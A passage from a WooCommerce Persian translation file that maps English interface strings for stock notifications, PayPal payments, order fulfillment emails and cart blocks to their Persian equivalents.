کنید.','Listen to the audio'=>'به صدا گوش دهید','Description for the setting field.'=>'توضیح برای فیلد تنظیم.','Create a new product with name, price, description, and other product attributes.'=>'یک محصول جدید با نام، قیمت، توضیح و سایر ویژگی‌های محصول ایجاد کنید.','Group title.'=>'عنوان گروه.','Group description.'=>'توضیح گروه.','Display order for the group.'=>'نمایش سفارش برای گروه.','Settings fields.'=>'فیلدهای تنظیمات.','Settings title.'=>'عنوان تنظیمات.','Settings description.'=>'توضیحات تنظیمات.','Email design'=>'طراحی ایمیل','Sorry, you cannot update resources.'=>'متاسفیم، شما نمی‌توانید منابع را به‌روزرسانی کنید.','Number of decimals must be between 0 and 10.'=>'تعداد ارقام اعشاری باید بین ۰ تا ۱۰ باشد.','Invalid selling location option.'=>'گزینه مکان فروش نامعتبر است.','Invalid shipping location option.'=>'گزینه محل ارسال نامعتبر است.','Settings group.'=>'گروه تنظیمات.','Setting field ID.'=>'تنظیم شناسه فیلد.','Setting field label.'=>'تنظیم برچسب فیلد.','Setting field type.'=>'تنظیم نوع فیلد.','Setting field value.'=>'تنظیم مقدار فیلد.','Add to cart details.'=>'جزئیات افزودن به سبد خرید.','Add to cart text.'=>'متن افزودن به سبد خرید.','Invalid or empty request body.'=>'متن درخواست نامعتبر یا خالی است.','Email sender name cannot be empty.'=>'نام فرستنده ایمیل نمی‌تواند خالی باشد.','When enabled, PayPal will use the address provided by the checkout form, and prevent the buyer from changing it inside the PayPal payment page. Disable this to let buyers choose a shipping address from their PayPal account. PayPal verifies addresses therefore this setting can cause errors (we recommend keeping it disabled).'=>'وقتی فعال باشد، پی‌پال از آدرس ارائه شده توسط فرم پرداخت استفاده می‌کند و از تغییر آن توسط خریدار در صفحه پرداخت پی‌پال جلوگیری می‌کند. این گزینه را غیرفعال کنید تا خریداران بتوانند آدرس ارسال را از حساب پی‌پال خود انتخاب کنند. پی‌پال آدرس‌ها را تأیید می‌کند، بنابراین این تنظیم می‌تواند باعث خطا شود (توصیه می‌کنیم آن را غیرفعال نگه دارید).','Sorry, you are not allowed to perform this action.'=>'متاسفیم، شما مجاز به انجام این عمل نیستید.','Add "Reply-to" email'=>'افزودن ایمیل «پاسخ به»','Invalid country/state format.'=>'ساختار کشور/ایالت نامعتبر است.','Setting field description.'=>'تنظیم توضیح فیلد.','Add to cart description.'=>'توضیح افزودن به سبد خرید.','Add to cart single text.'=>'تک متن افزودن به سبد خرید.','The order ID is required.'=>'شناسه سفارش الزامی است.','Please enter a valid reply-to email address.'=>'لطفا یک آدرس ایمیل معتبر برای «پاسخ به» وارد کنید.','Reply-to name cannot be empty when reply-to is enabled.'=>'وقتی گزینه «پاسخ به» فعال باشد، نام «پاسخ به» نمی‌تواند خالی باشد.','Customize the look and feel of all you notification emails.'=>'ظاهر و حس و حال تمام ایمیل‌های آگاه‌سازی خود را سفارشی‌سازی کنید.','Invalid country code in list.'=>'کد کشور نامعتبر در فهرست.','Prevent buyers from changing the shipping address.'=>'جلوگیری از تغییر آدرس ارسال توسط خریداران.','Payment pending (reason: %s).'=>'پرداخت در انتظار (دلیل: %s).','PayPal Buttons'=>'دکمه‌های پی‌پال','Enable PayPal Buttons'=>'فعال‌سازی دکمه‌های پی‌پال','PayPal order creation failed. PayPal debug ID: %1$s'=>'ایجاد سفارش پی‌پال ناموفق بود. شناسه اشکال‌زدایی پی‌پال: %1$s','PayPal payment captured. Transaction ID: %1$s.'=>'پرداخت پی‌پال ثبت شد. شناسه تراکنش: %1$s.','PayPal payment authorized. Transaction ID: %1$s. Change payment status to processing or complete to capture funds.'=>'پرداخت با پی‌پال مجاز شد. شناسه تراکنش: %1$s. وضعیت پرداخت را به در حال پردازش یا تکمیل تغییر دهید تا وجه دریافت شود.','. PayPal debug ID: %s'=>'. شناسه اشکال‌زدایی پی‌پال: %s','PayPal payment approval failed. PayPal Order ID: %1$s. Status: %2$s'=>'تایید پرداخت پی‌پال ناموفق بود. شناسه سفارش پی‌پال: %1$s. وضعیت: %2$s','PayPal payment approved. PayPal Order ID: %1$s'=>'پرداخت پی‌پال تایید شد. شناسه سفارش پی‌پال: %1$s','An unknown error occurred'=>'خطای ناشناخته‌ای رخ داد','We are unable to process your PayPal payment at this time. Please try again or use a different payment method.'=>'در حال حاضر ما قادر به پردازش پرداخت پی‌پال شما نیستیم. لطفا دوباره امتحان کنید یا از روش پرداخت دیگری استفاده کنید.','Taxes and coupons'=>'مالیات‌ها و کوپن‌ها','Enable taxes and coupons and configure how they are calculated.'=>'فعال‌سازی مالیات‌ها و کوپن‌ها و پیکربندی نحوه محاسبه آن‌ها.','block titleEmail Content'=>'محتوای ایمیل','back in stock formEnter your e-mail'=>'ایمیل خود را وارد کنید','back in stock formEmail address to be notified when this product is back in stock'=>'آدرس ایمیل برای اطلاع‌رسانی در صورت موجود شدن مجدد این محصول','Want to be notified when this product is back in stock?'=>'آیا می‌خواهید از موجود شدن مجدد این محصول مطلع شوید؟','You have received this message because your e-mail address was used to sign up for stock notifications on our store. Wasn\'t you? Please get in touch with us if you keep receiving these messages.'=>'شما این پیام را دریافت کرده‌اید زیرا از آدرس ایمیل شما برای ثبت‌نام در آگاه‌سازی‌های موجودی در فروشگاه ما استفاده شده است. اینطور نیست؟ اگر مرتبا این پیام‌ها را دریافت می‌کنید، لطفا با ما تماس بگیرید.','Full screen image'=>'تصویر تمام صفحه','Notify me'=>'به من اطلاع بده','To stop receiving these messages, %s to unsubscribe.'=>'برای توقف دریافت این پیام‌ها، %s را لغو اشتراک کنید.','This link will remain active for %s.'=>'این پیوند به مدت %s فعال خواهد ماند.','unsubscribe cta for stock notifications for guestsclick here'=>'اینجا کلیک کنید','To manage your notifications, %s to log in to your account.'=>'برای مدیریت آگاه‌سازی‌ها، %s را فشار دهید تا وارد حساب کاربری خود شوید.','unsubscribe cta for stock notifications for existing customersclick here'=>'اینجا کلیک کنید','You have received this message because your e-mail address was used to sign up for stock notifications on our store.'=>'شما این پیام را دریافت کرده‌اید زیرا از آدرس ایمیل شما برای ثبت نام در آگاه‌سازی‌های موجودی در فروشگاه ما استفاده شده است.','WooCommerce Customer Stock Notifications'=>'آگاه‌سازی‌های موجودی مشتری ووکامرس','User Email is invalid.'=>'ایمیل کاربر نامعتبر است.','User ID or User Email is required.'=>'شناسه کاربری یا ایمیل کاربری الزامی است.','notice actionResend verification'=>'ارسال مجدد تاییدیه','notice actionManage notifications'=>'مدیریت آگاه‌سازی‌ها','Product ID is required.'=>'شناسه محصول الزامی است.','Removed back-in-stock notification for product id: %d'=>'آگاه‌سازی موجود شدن مجدد برای شناسه محصول حذف شد: %d','Thanks for signing up! An account has been created for you. Please complete the sign-up process by following the verification link sent to your e-mail.'=>'از ثبت‌نام شما متشکریم! یک حساب کاربری برای شما ایجاد شده است. لطفاً مراحل ثبت‌نام را با دنبال کردن پیوند تأیید ارسال شده به ایمیل خود تکمیل کنید.','You have already joined this waitlist.'=>'شما قبلا به این فهرست انتظار پیوسته‌اید.','You have already joined this waitlist. Please complete the sign-up process by following the verification link sent to your e-mail.'=>'شما قبلا به این لیست انتظار پیوسته‌اید. لطفا با دنبال کردن پیوند تاییدی که به ایمیل شما ارسال شده است، فرآیند ثبت‌نام را تکمیل کنید.','Invalid user.'=>'کاربر نامعتبر.','Invalid email address.'=>'آدرس ایمیل نامعتبر.','back in stock formhere'=>'اینجا','back in stock formlog in'=>'ورود','Stock Notification confirm notificationConfirm'=>'تائید','To proceed, please consent to the creation of a new account with your e-mail.'=>'برای ادامه، لطفاً از طریق ایمیل خود، با ایجاد یک حساب کاربری جدید موافقت کنید.','Successfully verified stock notifications for "%s".'=>'آگاه‌سازی‌های موجودی برای "%s" با موفقیت تأیید شد.','You have successfully signed up! You will be notified when "%s" is back in stock.'=>'شما با موفقیت ثبت‌نام کردید! به محض موجود شدن مجدد "%s" به شما اطلاع داده خواهد شد.','Thanks for signing up! Please complete the sign-up process by following the verification link sent to your e-mail.'=>'از ثبت‌نام شما متشکریم! لطفاً مراحل ثبت‌نام را با دنبال کردن پیوند تأیید ارسال شده به ایمیل خود تکمیل کنید.','You have successfully signed up and will be notified when "%s" is back in stock! Note that a new account has been created for you; please check your e-mail for details.'=>'شما با موفقیت ثبت‌نام کردید و به محض موجود شدن مجدد "%s" به شما اطلاع داده خواهد شد! توجه داشته باشید که یک حساب کاربری جدید برای شما ایجاد شده است؛ لطفاً برای جزئیات بیشتر، ایمیل خود را بررسی کنید.','Failed to sign up. Please try again.'=>'ثبت‌نام ناموفق بود. لطفا دوباره امتحان کنید.','Please {login_link} to sign up for stock notifications.'=>'لطفا برای اطلاع از موجودی کالا در {login_link} ثبت‌نام کنید.','Confirm sign-up'=>'تایید ثبت‌نام','Thanks for joining the waitlist! You will hear from us again when "{product_name}" is back in stock.'=>'از پیوستن به لیست انتظار متشکریم! به محض موجود شدن مجدد "{product_name}" به شما خواهیم گرفت.','Join the "{product_name}" waitlist.'=>'به فهرست انتظار "{product_name}" بپیوندید.','Please follow the link below to complete the sign-up process and join the "{product_name}" waitlist.'=>'لطفا برای تکمیل فرآیند ثبت‌نام و پیوستن به فهرست انتظار "{product_name}"، روی لینک زیر کلیک کنید.','Successfully unsubscribed %1$s. You will not receive a notification when "%2$s" becomes available.'=>'%1$s با موفقیت لغو اشتراک شد. زمانی که محصول "%2$s" دوباره موجود شود، هیچ اطلاعیه‌ای دریافت نخواهید کرد.','You have already joined the waitlist! Click {manage_account_link} to manage your notifications.'=>'شما قبلا در فهرست انتظار ثبت‌نام کرده‌اید! برای مدیریت اطلاعیه‌های خود، روی {manage_account_link} کلیک کنید.','You have already signed up too many times. Please try again later.'=>'شما قبلا بیش از حد ثبت‌نام کرده‌اید. لطفا بعدا دوباره تلاش کنید.','It\'s back in stock!'=>'دوباره موجود شد!','Back in stock notification'=>'آگاه‌سازی موجود شدن دوباره','Search Notifications'=>'جستجوی آگاه‌سازی‌ها','Product not found.'=>'محصول پیدا نشد.','You have joined the "{product_name}" waitlist.'=>'شما به لیست انتظار "{product_name}" پیوسته‌اید.','Text to appear below the main e-mail header.'=>'متنی که قرار است زیر سربرگ اصلی ایمیل نمایش داده شود.','Email notificationShop Now'=>'اکنون خرید کنید','Great news: "{product_name}" is now available for purchase.'=>'خبر خوب: "{product_name}" اکنون برای خرید در دسترس است.','"{product_name}" is back in stock!'=>'«{product_name}» دوباره موجود شد!','View All'=>'مشاهده همه','Search by user e-mail'=>'جستجو بر اساس ایمیل کاربر','Waiting'=>'در انتظار','Resend verification email'=>'ارسال مجدد ایمیل تایید','Enter customer e-mail…'=>'ایمیل مشتری را وارد کنید…','Sign-up successful'=>'ثبت‌نام با موفقیت انجام شد','View profile →'=>'مشاهده پروفایل ←','Notification details'=>'جزئیات آگاه‌سازی','Notification actions'=>'اقدامات آگاه‌سازی','Add Notification'=>'افزودن آگاه‌سازی','View notifications →'=>'مشاهده آگاه‌سازی‌ها ←','Notification #%d details'=>'جزئیات آگاه‌سازی #%d','Edit Notification'=>'ویرایش آگاه‌سازی','Stock notifications'=>'آگاه‌سازی‌های موجودی','Email sent to signed-up customers when a product is back in stock.'=>'ارسال ایمیل به مشتریان ثبت‌نام شده هنگام موجود شدن دوباره محصول.','Signed-up customers'=>'مشتریان ثبت‌نام شده','Signed up'=>'ثبت‌نام شده','Email sent to customers after completing the sign-up process successfully.'=>'ایمیلی که پس از تکمیل موفقیت‌آمیز فرآیند ثبت‌نام، برای مشتریان ارسال می‌شود.','— or —'=>'— یا —','Let customers sign up to be notified when this product is restocked'=>'اجازه دهید مشتریان برای اطلاع از موجود شدن دوباره این محصول ثبت‌نام کنند.','No customers have signed up to receive stock notifications from you just yet.'=>'هنوز هیچ مشتری‌ای برای دریافت آگاه‌سازی‌های موجودی از شما، ثبت‌نام نکرده است.','Back in stock sign-up confirmation'=>'تایید ثبت‌نام برای موجود شدن دوباره','WooCommerce is currently configured to create new accounts without generating passwords automatically. Guests who sign up to receive stock notifications will need to reset their password before they can log into their new account.'=>'ووکامرس در حال حاضر به گونه‌ای پیکربندی شده است که بدون ایجاد خودکار رمز عبور، حساب‌های کاربری جدید ایجاد کند. مهمانانی که برای دریافت اعلان‌های موجودی ثبت‌نام می‌کنند، قبل از ورود به حساب کاربری جدید خود، باید رمز عبور خود را بازنشانی کنند.','WooCommerce is currently configured to hide out-of-stock products from your catalog. Customers will not be able sign up for back-in-stock notifications while this option is enabled.'=>'ووکامرس در حال حاضر به گونه‌ای پیکربندی شده است که محصولات ناموجود را از کاتالوگ شما پنهان کند. تا زمانی که این گزینه فعال باشد، مشتریان نمی‌توانند برای دریافت اعلان‌های موجودی دوباره، ثبت‌نام کنند.','Verification email sent to "%s".'=>'ایمیل تأیید به "%s" ارسال شد.','Please select a customer.'=>'لطفا یک مشتری انتخاب کنید.','Please select a product.'=>'لطفا یک محصول انتخاب کنید.','Notification not found.'=>'هیچ آگاه‌سازی‌ای یافت نشد.','Notification deleted.'=>'آگاه‌سازی حذف شد.','Notification updated.'=>'آگاه‌سازی به‌روزرسانی شد.','Notification sent to "%s".'=>'آگاه‌سازی به "%s" ارسال شد.','Failed to send notification. Please make sure that the listed product is available.'=>'ارسال آگاه‌سازی ناموفق بود. لطفاً مطمئن شوید که محصول ذکر شده موجود است.','Notification created.'=>'آگاه‌سازی ایجاد شد.','Notifications per page'=>'آگاه‌سازی‌ها در هر برگه','notifications_status%s notification deleted.'=>'%s آگاه‌سازی حذف شد.','notifications_status%s notification updated.'=>'%s آگاه‌سازی به‌روزرسانی شد.','Stock Notifications'=>'آگاه‌سازی‌های موجودی','Allow sign-ups'=>'اجازه ثبت‌نام','Guest sign-up'=>'ثبت‌نام مهمان','Controls how long the plugin will store unverified notification sign-ups in the database. Enter zero, or leave this field empty if you would like to store expired sign-up requests indefinitey.'=>'مدت زمانی که افزونه، ثبت‌نام‌های آگاه‌سازی تأیید نشده را در پایگاه داده ذخیره می‌کند، کنترل می‌کند. اگر می‌خواهید درخواست‌های ثبت‌نام منقضی شده را به طور نامحدود ذخیره کنید، عدد صفر را وارد کنید یا این فیلد را خالی بگذارید.','Delete unverified notification sign-ups after (in days)'=>'حذف ثبت‌نام‌های تایید نشده در آگاه‌سازی پس از (به روز)','A notification for the same product and customer already exists in your database.'=>'یک آگاه‌سازی برای همان محصول و مشتری از قبل در پایگاه داده شما وجود دارد.','When enabled, guests will be redirected to a login page to complete the sign-up process.'=>'وقتی فعال شود، مهمانان برای تکمیل فرآیند ثبت‌نام، به برگه ورود هدایت می‌شوند.','Customers must be logged in to sign up for stock notifications.'=>'مشتریان برای ثبت‌نام و دریافت آگاه‌سازی‌های موجودی، باید وارد سیستم شوند.','Platform %s not found.'=>'پلتفرم %s پیدا نشد.','Accept payments on your WooCommerce store securely.'=>'پرداخت‌ها را در فروشگاه ووکامرس خود به صورت ایمن بپذیرید.','column_nameUser/Email'=>'ایمیل/کاربر','column_nameStatus'=>'وضعیت','list table date hover formatY/m/d g:i:s a'=>'Y/m/d g:i:s a','stock notification statusActive'=>'فعال','stock notification statusPending'=>'در انتظار','“%s” (Edit)'=>'“%s” (ویرایش)','Select customer…'=>'انتخاب مشتری…','Select product…'=>'انتخاب محصول…','Invalid product selected.'=>'محصول نامعتبر انتخاب شده است.','column_nameProduct'=>'محصول','—'=>'—','column_nameNotification'=>'آگاه‌سازی','No Notifications found'=>'هیچ آگاه‌سازی‌ای یافت نشد','Delete this notification permanently?'=>'این آگاه‌سازی برای همیشه حذف شود؟','Delete the selected notifications permanently?'=>'آگاه‌سازی‌های انتخاب‌شده برای همیشه حذف شوند؟','stock notification statusSent'=>'ارسال شد','stock notification statusCancelled'=>'لغو شد','column_nameSigned Up'=>'ثبت‌نام شده','column_nameSKU'=>'شناسه محصول','Nexi Checkout'=>'Nexi Checkout','%d of 5 star'=>'%d از 5 ستاره','Invalid date provided.'=>'تاریخ ارائه‌شده نامعتبر است.','Action to disable the test account currently in use'=>'اقدام برای غیرفعال کردن حساب کاربری آزمایشی‌ای که در حال حاضر در حال استفاده است','block titleProduct'=>'محصول','block descriptionDisplay icons for available payment methods.'=>'نمایش آیکون‌ها برای روش‌های پرداخت موجود.','block titlePayment Method Icons'=>'آیکن‌های روش پرداخت','block keywordsingle product'=>'تک محصول','block keywordpayment methods'=>'روش‌های پرداخت','block keywordpayments'=>'پرداخت‌ها','block titleMini-Cart Contents'=>'محتویات سبد خرید کوچک','block descriptionDisplay a Mini-Cart widget.'=>'نمایش یک ابزارک سبد خرید کوچک.','You can access to more details of your order by visiting My Account > Orders and select the order you wish to see the latest status of the delivery.'=>'شما می‌توانید با مراجعه به حساب کاربری من > سفارشات، به جزئیات بیشتری از سفارش خود دسترسی پیدا کنید و سفارش مورد نظر خود را انتخاب کنید تا آخرین وضعیت ارسال آن را مشاهده کنید.','Pending items'=>'موارد در انتظار','Shipment %s'=>'مرسوله %s','Tracking URL'=>'URL رهگیری','Fulfillment summary'=>'خلاصه آماده‌سازی سفارش','No tracking information available for this fulfillment at the moment.'=>'در حال حاضر اطلاعات رهگیری برای این آماده‌سازی سفارش در دسترس نیست.','Track your shipment'=>'رهگیری مرسوله شما','Some details of your shipment have recently been updated. This may include tracking information, item contents, or delivery status.'=>'برخی جزئیات مرسوله شما به‌تازگی به‌روزرسانی شده‌اند. این اطلاعات ممکن است شامل جزئیات رهگیری، محتویات آیتم‌ها یا وضعیت تحویل باشد.','We wanted to let you know that one of the previously fulfilled shipments from your order has been removed from our system. This may have been due to a correction or an update in our fulfillment records. Don’t worry — this won’t affect any items you’ve already received.'=>'می‌خواستیم به شما اطلاع دهیم که یکی از مرسولات پیش‌تر تحویل‌شده سفارش شما از سیستم ما حذف شده است. این ممکن است به دلیل اصلاح یا به‌روزرسانی در سوابق تحویل باشد. نگران نباشید — این موضوع هیچ تاثیری بر مواردی که قبلا دریافت کرده‌اید نخواهد داشت.','Here’s the latest info we have:'=>'این آخرین اطلاعاتی که داریم است:','Tracking Number'=>'شماره رهگیری','You can access more details of your order by visiting My Account > Orders, and selecting the order you wish to see the latest status for.'=>'شما می‌توانید با مراجعه به حساب کاربری من > سفارشات و انتخاب سفارشی که می‌خواهید آخرین وضعیت آن را ببینید، به جزئیات بیشتری از سفارش خود دسترسی پیدا کنید.','Order ID is required.'=>'شناسه سفارش الزامی است.','The meta key to delete.'=>'کلید متا برای حذف.','The response message.'=>'پیام پاسخ.','The type of entity for which the fulfillment is created.'=>'نوع موجودیتی که آماده‌سازی برای آن ایجاد شده است.','The status of the fulfillment.'=>'وضعیت آماده‌سازی سفارش.','Meta data for the fulfillment.'=>'داده‌های متای آماده‌سازی سفارش.','Invalid fulfillment ID.'=>'شناسه آماده‌سازی سفارش نامعتبر است.','The date the fulfillment was deleted.'=>'تاریخی که آماده‌سازی سفارش حذف شده.','The date the fulfillment was last updated.'=>'تاریخی که آماده‌سازی سفارش آخرین بار به‌روزرسانی شده.','Fulfillment deleted successfully.'=>'آماده‌سازی سفارش با موفقیت حذف شد.','Woo! Some items you purchased are being fulfilled. You can use the below information to track your shipment:'=>'اوه! برخی از آیتم‌هایی که خریداری کرده‌اید در حال تحویل هستند. می‌توانید از اطلاعات زیر برای رهگیری مرسوله خود استفاده کنید:','Shipment %1$s was shipped on %2$s'=>'مرسوله %1$s در تاریخ %2$s ارسال شد','The tracking URL.'=>'URL رهگیری.','The shipping provider.'=>'ارائه‌دهنده حمل و نقل.','The tracking number details response.'=>'پاسخ جزئیات شماره رهگیری.','The tracking number to look up.'=>'شماره رهگیری برای استعلام.','Missing attributes for variable product.'=>'ویژگی‌ها برای محصول متغیر وجود ندارد.','The tracking number.'=>'شماره رهگیری.','Tracking number is required.'=>'شماره رهگیری الزامی است.','No tracking number available'=>'شماره رهگیری در دسترس نیست','Multiple trackings'=>'رهگیری‌های چندگانه','Variation system generated attribute name.'=>'نام ویژگی تولید شده توسط سیستم تنوع.','Multiple providers'=>'ارائه‌دهندگان متعدد','Please select product attributes before adding to cart.'=>'لطفا قبل از افزودن به سبد خرید، ویژگی‌های محصول را انتخاب کنید.','Stats about groups of customers.'=>'آمار مربوط به گروه‌های مشتریان.','Invalid item.'=>'مورد نامعتبر.','In progress'=>'در حال انجام','View Fulfillments'=>'مشاهده آماده‌سازی سفارش','Fulfillment Status'=>'وضعیت آماده‌سازی سفارش','Invalid fulfillment.'=>'آماده‌سازی سفارش نامعتبر.','Failed to delete fulfillment.'=>'حذف آماده‌سازی سفارش ناموفق بود.','Failed to update fulfillment.'=>'به‌روزرسانی آماده‌سازی سفارش ناموفق بود.','Fulfillment not found.'=>'آماده‌سازی سفارش یافت نشد.','Shipment Provider'=>'ارائه‌دهنده مرسوله','Number of items in the cart: %d'=>'تعداد موارد در سبد خرید: %d','(items: %d)'=>'(موارد: %d)','Number of items in the cart: %1$d. Total price of %2$s'=>'تعداد موارد در سبد خرید: %1$d. قیمت کل %2$s','Please select some products to add to the cart.'=>'لطفا محصولاتی را برای افزودن به سبد خرید انتخاب کنید.','Coupons lookup table does not exist.'=>'جدول استعلام کوپن‌ها وجود ندارد.','No entries with zero discount amount found. Coupons lookup table is up to date.'=>'هیچ ورودی‌ای با مقدار تخفیف صفر یافت نشد. جدول استعلام کوپن‌ها به‌روز است.','Failed to insert fulfillment.'=>'درج اطلاعات تکمیل‌شده ناموفق بود.','If anything looks off or you have questions, feel free to contact our support team.'=>'اگر چیزی درست به نظر نمی‌رسد یا سوالی دارید، با تیم پشتیبانی ما تماس بگیرید.','Repair'=>'تعمیر','Product maximum price.'=>'حداکثر قیمت محصول.','Product minimum price.'=>'حداقل قیمت محصول.','Fulfillment updated emails are sent to the customer when the merchant updates a fulfillment for the order. The notification isn’t sent for draft fulfillments.'=>'ایمیل‌های به‌روزرسانی آماده‌سازی سفارش، زمانی برای مشتری ارسال می‌شوند که فروشنده اطلاعات آماده‌سازی سفارش را به‌روزرسانی کند. این آگاه‌سازی برای آماده‌سازی‌های پیش‌نویس ارسال نمی‌شود.','Your shipment has been updated'=>'مرسوله شما به‌روزرسانی شد','A shipment from {site_title} order {order_number} has been updated'=>'یک مرسوله از سفارش {order_number} در {site_title} به‌روزرسانی شد','Coupons lookup table'=>'جدول استعلام کوپن‌ها','This tool will repair the coupons lookup table data with missing discount amounts. This process may take a while.'=>'این ابزار، داده‌های جدول استعلام کوپن‌ها را که مقادیر تخفیف آن‌ها ناقص است، تعمیر می‌کند. این فرایند ممکن است مدتی طول بکشد.','If you have any questions or notice anything unexpected, feel free to reach out to our support team through your account or reply to this email.'=>'اگر سوالی دارید یا متوجه مورد غیرمنتظره‌ای شدید، می‌توانید از طریق حساب کاربری خود با تیم پشتیبانی ما تماس بگیرید یا به این ایمیل پاسخ دهید.','Fulfillment updated'=>'آماده‌سازی سفارش به‌روزرسانی شد','One of your shipments has been removed'=>'یکی از مرسولات شما حذف شد','A shipment from {site_title} order {order_number} has been cancelled'=>'یک مرسوله از سفارش {order_number} در {site_title} لغو شد','Your item is on the way!'=>'کالای شما در راه است!','Expected Delivery'=>'تحویل مورد انتظار','Fulfillment deleted'=>'آماده‌سازی سفارش حذف شد','Please note that couriers may need some time to provide the latest shipping information.'=>'لطفا توجه داشته باشید که شرکت‌های حمل و نقل ممکن است برای ارائه آخرین اطلاعات ارسال، به کمی زمان نیاز داشته باشند.','An item from {site_title} order {order_number} has been fulfilled!'=>'یک مورد از سفارش {order_number} از {site_title} ارسال شد!','Fulfillment created'=>'آماده‌سازی سفارش ایجاد شد','To offer local pickup, configure your pickup locations in the local pickup settings.'=>'برای ارائه دریافت حضوری، مکان‌های دریافت خود را در تنظیمات دریافت حضوری پیکربندی کنید.','block titleAdd to Cart + Options (Beta)'=>'افزودن به سبد خرید + گزینه‌ها (بتا)','block descriptionDisplay any product variations available to select from and add to cart.'=>'نمایش هرگونه تنوع محصول در دسترس برای انتخاب و افزودن به سبد خرید.','block titleVariation Selector (Beta)'=>'انتخابگر تنوع (بتا)','block descriptionA template for attribute name and options that will be applied to all variable products with attributes.'=>'قالبی برای نام ویژگی و گزینه‌هایی که برای همه محصولات متغیر دارای ویژگی اعمال خواهد شد.','block titleVariation Selector: Template (Beta)'=>'انتخابگر تنوع: قالب (بتا)','block descriptionUse blocks to create an "Add to cart" area that\'s customized for different product types, such as variable and grouped. '=>'از بلوک‌ها برای ایجاد یک قسمت «افزودن به سبد خرید» استفاده کنید که برای انواع مختلف محصولات، مانند محصولات متغیر و محصولات گروه‌بندی‌شده، سفارشی‌سازی شده باشد. ','block descriptionFormat the name of an attribute associated with a variable product.'=>'نام یک ویژگی مرتبط با یک محصول متغیر را قالب‌بندی کنید.','block titleGrouped Product: Template (Beta)'=>'محصول گروه‌بندی‌شده: الگو (بتا)','block descriptionAdd a way of selecting a child product within the Grouped Product block. Depending on the type of product and its properties, this might be a button, a checkbox, or a link.'=>'روشی برای انتخاب یک محصول فرزند در بلوک محصولات گروهی اضافه کنید. بسته به نوع محصول و ویژگی‌های آن، این می‌تواند یک دکمه، یک کادر انتخاب یا یک لینک باشد.','block titleGrouped Product: Item Selector (Beta)'=>'محصول گروه‌بندی‌شده: انتخابگر آیتم (بتا)','block descriptionDisplay the product title as a label or paragraph.'=>'عنوان محصول را به صورت برچسب یا پاراگراف نمایش دهید.','block titleGrouped Product: Item Label (Beta)'=>'محصول گروه‌بندی‌شده: برچسب کالا (بتا)','block descriptionDisplay a button that lets customers add a product to their cart. Use the added options to optimize for different product types.'=>'دکمه‌ای را نمایش دهید که به مشتریان امکان می‌دهد محصولی را به سبد خرید خود اضافه کنند. از گزینه‌های اضافه شده برای بهینه‌سازی انواع مختلف محصولات استفاده کنید.','We’re getting in touch to let you know that your order #%1$s has been cancelled.'=>'ما در حال تماس با شما هستیم تا به شما اطلاع دهیم که سفارش شما #%1$s لغو شده است.','We’re sorry to let you know that your order #%1$s has been cancelled.'=>'با عرض پوزش، به اطلاع شما می‌رسانیم که سفارش شما با کد #%1$s لغو شده است.','One or more BCC email addresses are invalid: “%s”. Please enter valid email addresses separated by commas.'=>'یک یا چند آدرس ایمیل BCC نامعتبر است: “%s”. لطفاً آدرس‌های ایمیل معتبری را که با کاما از هم جدا شده‌اند، وارد کنید.','Order Billing Address'=>'آدرس پرداخت سفارش','Order Shipping Address'=>'آدرس ارسال سفارش','Order Shipping Method'=>'روش ارسال سفارش','Order Transaction ID'=>'شناسه تراکنش سفارش','Order Shipping'=>'ارسال سفارش','Order Discount'=>'تخفیف سفارش','Search Emails'=>'جستجوی ایمیل‌ها','View Email'=>'نمایش ایمیل','New Email'=>'ایمیل تازه','Edit Email'=>'ویرایش ایمیل','Add Email'=>'افزودن ایمیل','Store Information'=>'اطلاعات فروشگاه','Here’s a reminder of what you’ve bought:'=>'در اینجا یادآوری می‌کنم که چه چیزی خریده‌اید:','Product with ID "%s" was not found and cannot be added to the cart.'=>'محصولی با شناسه "%s" یافت نشد و نمی‌توان آن را به سبد خرید اضافه کرد.','You cannot add "%s" with a quantity less than or equal to 0 to the cart.'=>'شما نمی‌توانید «%s» را با تعداد کمتر یا مساوی ۰ به سبد خرید اضافه کنید.','Invalid user ID.'=>'شناسه کاربر نامعتبر است.','Enable Point of Sale functionality in the WooCommerce mobile apps.'=>'قابلیت فروش در اپلیکیشن موبایل ووکامرس را فعال کنید.','Order Custom Field'=>'سفارش فیلد سفارشی','Order Admin URL'=>'آدرس اینترنتی مدیریت سفارش','Order View URL'=>'آدرس مشاهده سفارش','Your order #%s has been cancelled.'=>'سفارش #%s شما لغو شد.','Order Cancelled: #%s'=>'سفارش لغو شد: #%s','One or more CC email addresses are invalid: “%s”. Please enter valid email addresses separated by commas.'=>'یک یا چند آدرس ایمیل CC نامعتبر است: “%s”. لطفاً آدرس‌های ایمیل معتبری را که با کاما از هم جدا شده‌اند، وارد کنید.','One or more Recipient email addresses are invalid: “%s”. Please enter valid email addresses separated by commas.'=>'یک یا چند آدرس ایمیل گیرنده نامعتبر است: «%s». لطفاً آدرس‌های ایمیل معتبری را که با کاما از هم جدا شده‌اند، وارد کنید.','Keep your store online with full security and backups'=>'فروشگاه خود را با امنیت کامل و پشتیبان گیری آنلاین نگه دارید','Protect your store and your shoppers with Jetpack'=>'با جت‌پک از فروشگاه و خریداران خود محافظت کنید','Unable to create HPOS tables for synchronization.'=>'قادر به ایجاد جداول HPOS برای همگام‌سازی نیست.','Error unable to generate email post.'=>'با جت از فروشگاه و خود محافظت کنید','Email post generated for %s.'=>'پست ایمیل برای %s ایجاد شد.','Error generating email post. Error: %s.'=>'خطا در ایجاد پست ایمیل. خطا: %s.','The post ID of the generated email post.'=>'شناسه پست مربوط به پست ایمیل تولید شده.','The email ID to recreate the post for.'=>'شناسه ایمیلی که قرار است پست برای آن بازسازی شود.','%1$s - Image %2$d'=>'%1$s - تصویر %2$d','This feature is not available when using the Cart and checkout blocks. Shipping will be calculated at checkout.'=>'این ویژگی هنگام استفاده از سبد خرید و بلوک‌های پرداخت در دسترس نیست. هزینه ارسال در هنگام پرداخت محاسبه می‌شود.','The provided checkout link was out of date or invalid. No products were added to the cart.'=>'لینک پرداخت ارائه شده قدیمی یا نامعتبر بود. هیچ محصولی به سبد خرید اضافه نشد.','5 minutes'=>'5 دقیقه','Added to cart'=>'افزودن به سبد خرید','Price range: %1$s through %2$s'=>'محدوده قیمت: %1$s تا %2$s','Price range: from-to%1$s %2$s'=>'%1$s %2$s','Receive an email notification every time a new order is placed'=>'هر بار که سفارش جدیدی ثبت می‌شود، از طریق ایمیل مطلع شوید','Send an email to customers notifying them that their password has been reset'=>'ارسال ایمیل به مشتریان و اطلاع رسانی به آنها مبنی بر تغییر رمز عبورشان','Send an email to customers notifying them when an order has been partially or fully refunded'=>'ارسال ایمیل به مشتریان و اطلاع رسانی به آنها در صورت 